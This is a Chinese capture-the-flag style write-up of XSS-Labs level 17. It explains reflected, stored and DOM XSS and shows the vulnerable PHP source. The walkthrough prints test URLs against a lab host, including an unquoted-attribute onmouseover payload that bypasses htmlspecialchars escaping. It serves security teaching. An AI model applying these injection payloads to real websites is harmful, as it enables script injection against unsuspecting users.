0x01 XSS-Labs

XSS（跨站脚本攻击）是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。
XSS按照利用方式主要分为：反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种XSS即存储型XSS，非常危险，容易造成蠕虫，大量盗窃cookie。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞。

XSS-Labs是使用PHP编写的一个XSS漏洞练习平台，一共包含20关，其主要为反射型XSS，可以练习基础XSS的过滤和绕过技巧，且每一关的后台源码都重写了alert()方法，只要成功弹框即可调用重写的alert()方法进入下一关或完成本关测试。

0x02 实验工具

IE
HackBar

0x03 实验环境

服务器：Windows Server 2008
中间件：Apache
客户端：Windows 10

实验界面如下图所示：

0x04 实验步骤

禁用IE的XSS筛选器。【工具】-》【Internat选项】-》【安全】-》【自定义级别】-》【脚本：启动XSS筛选器】，设置为禁用。
使用如下payload进行测试，查看参数的回显位置以及是否被转义或过滤。
```
http://10.10.10.148:8203/level17.php?arg01=a&arg02=<script>alert(/onclink+src+data+href/)</script>
```
由上述操作可以推断，程序对参数中的预定义字符进行了转义，使用不含预定义字符的语句可以正常弹框，所以此处存在XSS漏洞。

构造如下所示的payload进行漏洞测试，结果如下图所示。

http://10.10.10.148:8203/level17.php?arg01=a&arg02=+onmouseover=alert(1)

代码审计。程序源码如下所示：

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错！");
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后，<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>

由16行代码可知：GET方法得到的参数经过htmlspecialchars()函数转义后回显到HTML页面中。

所以含有的预定义字符的注入无效，但不含预定义字符构成的XSS仍可以使用。

0x05 实验分析

程序未做任何转义或过滤就将参数回显到HTML页面中，所以此关的payload非常多：
```
onmouseover=alert(1)
...
```

0x06 参考链接

跨站脚本漏洞(XSS)基础讲解

XSS之xss-labs-level17相关推荐

XSS平台 XSS挑战之旅解题记录 writeup
XSS平台 XSS挑战之旅解题记录 writeup level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 le ...
DVWA通关--存储型XSS（XSS (Stored)）
目录 LOW 通关步骤源码分析 MEDIUM 通关步骤源码分析 HIGH 通关步骤源码分析 IMPOSSIBLE 源码分析存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据 ...
【安全系列之XSS】XSS攻击测试以及防御
跨站脚本攻击跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击者往 ...
XSS学习-XSS挑战之旅(二)
前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识. 第十一关这关坑我好长时间,看了好多博客直接给说修改Referer,给截图中都有自带的Refer ...
什么是XSS攻击XSS攻击应用场景
XSS攻击什么是XSS攻击手段 XSS攻击使用Javascript脚本注入进行攻击例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端. < ...
php csrf攻击 xss区别,XSS与CSRF攻击及防御方法
前言 web安全这词可能对于服务端工程师来说更加"眼熟",部分前端工程师并不是十分了解,今天就来讲讲XSS攻击与CSRF攻击及防御方法 XSS XSS (Cross Site Sc ...
XSS入门 XSS Challenges靶场搭建/前五关/基础教程
前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似目录一.实验环境--XSS Challenges 二.探测XSS过程第一关第二关 ...
php反射型xss,反射型XSS测试及修复
反射型XSS一般出现的位置,如GET参数中测试搜索功能 F12查看源码,查找出现1111的位置第一个位置在title处尝试闭合掉title标签,然后测试JS代码,成功弹窗查看源码,XSS执行 ...
XSS Trap—XSS DNS防护的简单尝试
安全客点评思路挺新颖的,虽然这种防护有一定的局限性,比如攻击者用IP替代域名就绕过了,但是可以通过文中提及的XSS DNS防护方式了解到企业业务中有哪些WEB服务的XSS点正在被利用,方便排查,而且 ...
12. xss bypass xss截屏
layout: post title: 12. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言该篇记录为记录实际的src过程第12篇小 ...

XSS之xss-labs-level17

文章目录